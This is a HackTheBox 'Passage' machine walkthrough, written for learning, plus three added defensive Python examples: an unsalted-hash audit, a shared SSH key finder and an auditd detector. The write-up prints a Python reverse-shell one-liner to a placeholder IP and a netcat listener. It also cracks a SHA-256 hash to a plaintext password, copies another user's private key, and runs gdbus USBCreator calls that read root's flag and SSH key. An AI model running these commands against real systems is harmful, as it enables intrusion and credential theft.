This is a write-up for the machine “Passage” on HackTheBox. It is a medium-difficulty machine.
I first started by enumerating the target with ‘nmap’ using the following commands:
nmap -p- --min-rate 10000 -oA nmap_all_tcp 10.10.10.206
nmap -p 22,80 -sC -sV 10.10.10.206
Since port 80 is open, let’s test the web application. I visited http://10.10.10.206:80 and found nothing interesting. On viewing the page source, I noticed that it referenced another page, http://10.10.10.206:80/CuteNews.
Like everyone else, I tried fuzzing for more hidden pages and got blocked for a while; I had to wait a few minutes before I could reach the website again. On its home page, I found that it was running an intrusion prevention tool called Fail2Ban, which explained the blocking. I then visited http://10.10.10.206:80/CuteNews and got a login page.
I tried all the default credentials but nothing worked. The login page showed that it was running CuteNews 2.1.2. I googled for exploits and found this page on exploit-db. I downloaded it and used this command to execute it.
Upon entering the URL as input, I got a shell straight away. Then I used the following command to get a better shell.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR IP",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
I also had ‘netcat’ listening on port 4242.
nc -lvnp 4242
python3 -c "import pty;pty.spawn('/bin/bash')"
I tried to read the user.txt flag, but I didn’t have permission to access it. When I checked the ‘/home’ directory I found two users, ‘paul’ and ‘nadav’. Before executing the exploit from exploit-db, I had looked at its contents and found that it decoded a base64-encoded file named ‘lines’ in the location ‘/CuteNews/cdata/users’.
I opened ‘lines’ and it was indeed base64 encoded. I decoded it using an online base64 decoder.
I got the below content after decoding.
Then, I tried to identify the password hash (e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd) with ‘hash-identifier’, which identified it as SHA-256. After that, I cracked the password using the following command:
john --wordlist=<YOUR-WORDLIST> --format=raw-sha256 user.txt
Here, user.txt contains the hash, which I wrote with:
echo "e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd" > user.txt
Now I could switch to paul with the password ‘atlanta1’.
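The password fell quickly because CuteNews stored it as a bare, unsalted SHA-256 digest, which costs one hash per guess and is shared by every user with the same password. The following is an added example (not CuteNews code and not part of the original write-up) that audits a decoded user store for that scheme and shows the salted PBKDF2-HMAC-SHA256 record a fixed application would store instead. The dictionary layout, the `pbkdf2_sha256$…` record format and the 600,000 iteration count are assumptions for the example; the only value taken from the page is paul’s hash.

```python
import hashlib
import hmac
import os
import re
from typing import Dict, List, Optional

# PBKDF2-HMAC-SHA256 work factor; this value is an assumption for the example.
PBKDF2_ITERATIONS = 600_000
# A 64-character lowercase hex string with no salt or scheme marker is a bare SHA-256.
BARE_SHA256 = re.compile(r"^[0-9a-f]{64}$")

# Constructed stand-in for a decoded CuteNews user store: one account still on
# the unsalted scheme (hash taken from the write-up) and one already migrated.
SAMPLE_USERS: Dict[str, Dict[str, str]] = {
    "paul": {"pass": "e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd"},
    "nadav": {"pass": "pbkdf2_sha256$600000$" + "00" * 16 + "$" + "11" * 32},
}


def weak_hash(password: str) -> str:
    """Unsalted, single-round SHA-256: the scheme found in the 'lines' file.

    Two users with the same password get the same digest, and a leaked digest
    can be attacked with precomputed tables or a very fast wordlist run.
    """
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def make_strong_record(password: str, salt: Optional[bytes] = None) -> str:
    """Salted PBKDF2-HMAC-SHA256, serialised as scheme$iterations$salt$hash."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_strong(password: str, record: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    parts = record.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return False
    _, iterations, salt_hex, dk_hex = parts
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(dk.hex(), dk_hex)


def audit_user_store(users: Dict[str, Dict[str, str]]) -> List[str]:
    """Names of accounts whose stored password is still a bare unsalted SHA-256."""
    return sorted(
        name for name, rec in users.items() if BARE_SHA256.match(rec.get("pass", ""))
    )


if __name__ == "__main__":
    print("accounts on the weak scheme:", audit_user_store(SAMPLE_USERS))
    record = make_strong_record("example-only")
    print("migrated record verifies:", verify_strong("example-only", record))
```

Running the audit on a real export is the quick way to find every account that needs a forced password reset after a store like ‘lines’ has been exposed; the migrated records carry their own salt and cost, so the same password never produces the same record twice.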
I got the user flag from /home/paul. That was everything possible as paul. While I was checking for ways to switch users, I found the file ‘/home/paul/.ssh/authorized_keys’.
Before using SSH to log in as nadav, I copied paul’s id_rsa (/home/paul/.ssh/id_rsa) to my local machine so I could easily access paul’s account again, and then switched to nadav.
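The lateral move from paul to nadav works because one private key is authorised for two accounts. The script below is an added example (not part of the write-up or of OpenSSH) that a defender can run to find such cross-account key reuse: it parses authorized_keys bodies, computes the OpenSSH-style SHA256 fingerprint of each key blob, and reports any fingerprint that opens more than one account. The sample files and the `fake_key` blobs are constructed for the example and are not real keys; `collect_from_filesystem` assumes the default per-user authorized_keys locations.

```python
import base64
import glob
import hashlib
import os
import re
from typing import Dict, List

# Matches "<keytype> <base64 blob>" anywhere on a line, so leading options such as
# command="..." or from="..." are skipped. Only the blob determines key identity.
KEY_RE = re.compile(r"(?:^|\s)((?:ssh-|ecdsa-sha2-|sk-)\S+)\s+([A-Za-z0-9+/=]+)")


def fake_key(label: str) -> str:
    # Constructed stand-in for a public key blob; not a real key.
    return base64.b64encode(f"constructed-blob-{label}".encode()).decode()


# Constructed sample: paul's key also appears in nadav's file, which is the
# cross-account reuse the write-up relied on.
SAMPLE_AUTHORIZED_KEYS: Dict[str, str] = {
    "paul": f"ssh-rsa {fake_key('paul')} paul@passage\n",
    "nadav": (
        f"ssh-rsa {fake_key('paul')} paul@passage\n"
        f"ssh-ed25519 {fake_key('nadav')} nadav@passage\n"
    ),
    "root": f"# admin key\nssh-ed25519 {fake_key('root')} root@passage\n",
}


def fingerprint(blob_b64: str) -> str:
    """OpenSSH-style SHA256 fingerprint of the decoded key blob (base64, no padding)."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str) -> List[str]:
    """Fingerprints of every key in one authorized_keys file body."""
    fps = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = KEY_RE.search(line)
        if m:
            fps.append(fingerprint(m.group(2)))
    return fps


def find_shared_keys(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Map fingerprint -> sorted account names, keeping only keys that open more than one account."""
    owners: Dict[str, set] = {}
    for account, text in files.items():
        for fp in parse_authorized_keys(text):
            owners.setdefault(fp, set()).add(account)
    return {fp: sorted(accts) for fp, accts in owners.items() if len(accts) > 1}


def collect_from_filesystem() -> Dict[str, str]:
    """Read the real files on a host; the account name is the directory above .ssh."""
    files = {}
    for path in glob.glob("/home/*/.ssh/authorized_keys") + ["/root/.ssh/authorized_keys"]:
        try:
            with open(path) as fh:
                account = os.path.basename(os.path.dirname(os.path.dirname(path)))
                files[account] = fh.read()
        except OSError:
            continue
    return files


if __name__ == "__main__":
    for fp, accounts in find_shared_keys(SAMPLE_AUTHORIZED_KEYS).items():
        print(f"{fp} authorises {', '.join(accounts)}")
```

A single shared key means that whoever reads one user’s id_rsa gets every account it is authorised for, so each hit from `find_shared_keys` is a key to rotate and a boundary to re-establish with separate key pairs.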
I still couldn’t access root.txt, so I kept searching for interesting files. After hours of searching, I noticed something interesting in ‘/home/nadav/.viminfo’, which usually stores command-line history, search-string history, input-line history, file marks, the history of file marks and more. Looking into it, I saw that nadav had been editing ‘/etc/dbus-1/system.d/com.ubuntu.USBCreator.conf’.
Also, while running linpeas.sh, I got the below findings
Since dbus-1.0 appeared in both of these findings, I thought I would google it and check for known vulnerabilities. I found that D-Bus is used for communication between multiple processes running concurrently on the same machine. This article by Nadav Markus describes everything you need to know about exploiting this service. Then I used the following command to get ‘root.txt’:
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/root.txt /root.txt true
The above command copies files from one location to another without prompting for a password or checking the destination. This allows any user to write files anywhere on the system without a password prompt. Now I could read root.txt. But CTF is not just about root.txt or user.txt (it’s about FUN), so I used the command below to copy ‘/root/.ssh/id_rsa’ and got the root key.
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /id_rsa true
This bug was later fixed by Ubuntu. Now the user has to enter a password to use USBCreator.
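Until a host carries the fixed package, the practical defence is to notice the misuse: the gdbus calls above are ordinary process executions, so an auditd rule that logs execve (for example `-a always,exit -F arch=b64 -S execve`) records their full argument list. The following is an added detection example (not part of the write-up and not Ubuntu or usbcreator code) that reconstructs argv from auditd EXECVE records and flags USBCreator.Image calls that read a protected path or write into a system directory. The audit lines are constructed for the example (record 202 mirrors the gdbus call from the write-up, record 203 is the legitimate ISO-to-USB use the service exists for); the path lists are assumptions and should be tuned per host.

```python
import os
import re
from typing import Dict, List, Optional, Tuple

IMAGE_METHOD = "com.ubuntu.USBCreator.Image"
# auditd writes quoted argv entries as a0="...", a1="..."; entries containing
# whitespace or quotes are hex-encoded without quotes and are not handled here.
ARG_RE = re.compile(r'\ba(\d+)="((?:[^"\\]|\\.)*)"')
EVENT_RE = re.compile(r"msg=audit\(([\d.]+):(\d+)\)")

# Paths an unprivileged caller has no business reading through the service ...
SENSITIVE_SOURCES: Tuple[str, ...] = ("/root/", "/etc/shadow", "/etc/sudoers")
SENSITIVE_SOURCE_RE = re.compile(r"^/home/[^/]+/\.ssh/")
# ... and paths where an arbitrary write means persistence or privilege escalation.
SENSITIVE_DESTS: Tuple[str, ...] = (
    "/etc/", "/root/", "/usr/", "/bin/", "/sbin/", "/lib/", "/var/spool/cron/",
)

# Constructed auditd EXECVE records (not taken from the target).
SAMPLE_AUDIT_LINES = [
    'type=EXECVE msg=audit(1600000000.100:201): argc=3 a0="ls" a1="-la" a2="/home/nadav"',
    'type=EXECVE msg=audit(1600000000.200:202): argc=12 a0="gdbus" a1="call" a2="--system" '
    'a3="--dest" a4="com.ubuntu.USBCreator" a5="--object-path" a6="/com/ubuntu/USBCreator" '
    'a7="--method" a8="com.ubuntu.USBCreator.Image" a9="/root/.ssh/id_rsa" a10="/tmp/id_rsa" a11="true"',
    'type=EXECVE msg=audit(1600000000.300:203): argc=12 a0="gdbus" a1="call" a2="--system" '
    'a3="--dest" a4="com.ubuntu.USBCreator" a5="--object-path" a6="/com/ubuntu/USBCreator" '
    'a7="--method" a8="com.ubuntu.USBCreator.Image" a9="/home/nadav/ubuntu.iso" '
    'a10="/media/nadav/usb/ubuntu.iso" a11="true"',
]


def parse_execve(line: str) -> Optional[Tuple[str, List[str]]]:
    """Return (event id, argv) for an EXECVE record, or None for any other record."""
    if "type=EXECVE" not in line:
        return None
    argv = [v for _, v in sorted((int(i), v) for i, v in ARG_RE.findall(line))]
    m = EVENT_RE.search(line)
    return (m.group(2) if m else "?"), argv


def classify_image_call(argv: List[str]) -> Optional[Tuple[str, str, List[str]]]:
    """For a gdbus call of USBCreator.Image, return (source, destination, reasons)."""
    if not argv or os.path.basename(argv[0]) != "gdbus" or "call" not in argv:
        return None
    if IMAGE_METHOD not in argv:
        return None
    i = argv.index(IMAGE_METHOD)
    if i + 2 >= len(argv):  # the method takes source, destination, allow-overwrite
        return None
    src, dst = argv[i + 1], argv[i + 2]
    reasons = []
    if src.startswith(SENSITIVE_SOURCES) or SENSITIVE_SOURCE_RE.match(src):
        reasons.append(f"reads protected path {src}")
    if dst.startswith(SENSITIVE_DESTS):
        reasons.append(f"writes into system path {dst}")
    return src, dst, reasons


def detect_usbcreator_abuse(lines: List[str]) -> List[Dict[str, object]]:
    """Findings for every Image call whose source or destination is sensitive."""
    findings = []
    for line in lines:
        parsed = parse_execve(line)
        if parsed is None:
            continue
        event, argv = parsed
        call = classify_image_call(argv)
        if call and call[2]:
            findings.append(
                {"event": event, "source": call[0], "destination": call[1], "reasons": call[2]}
            )
    return findings


if __name__ == "__main__":
    for f in detect_usbcreator_abuse(SAMPLE_AUDIT_LINES):
        print(f"audit event {f['event']}: {'; '.join(f['reasons'])}")
```

The same argv reconstruction works for any other privileged D-Bus helper: only the method name and the positions of the path arguments change. Legitimate USBCreator use copies an image from a user directory to removable media, so the two path checks separate it cleanly from the escalation pattern.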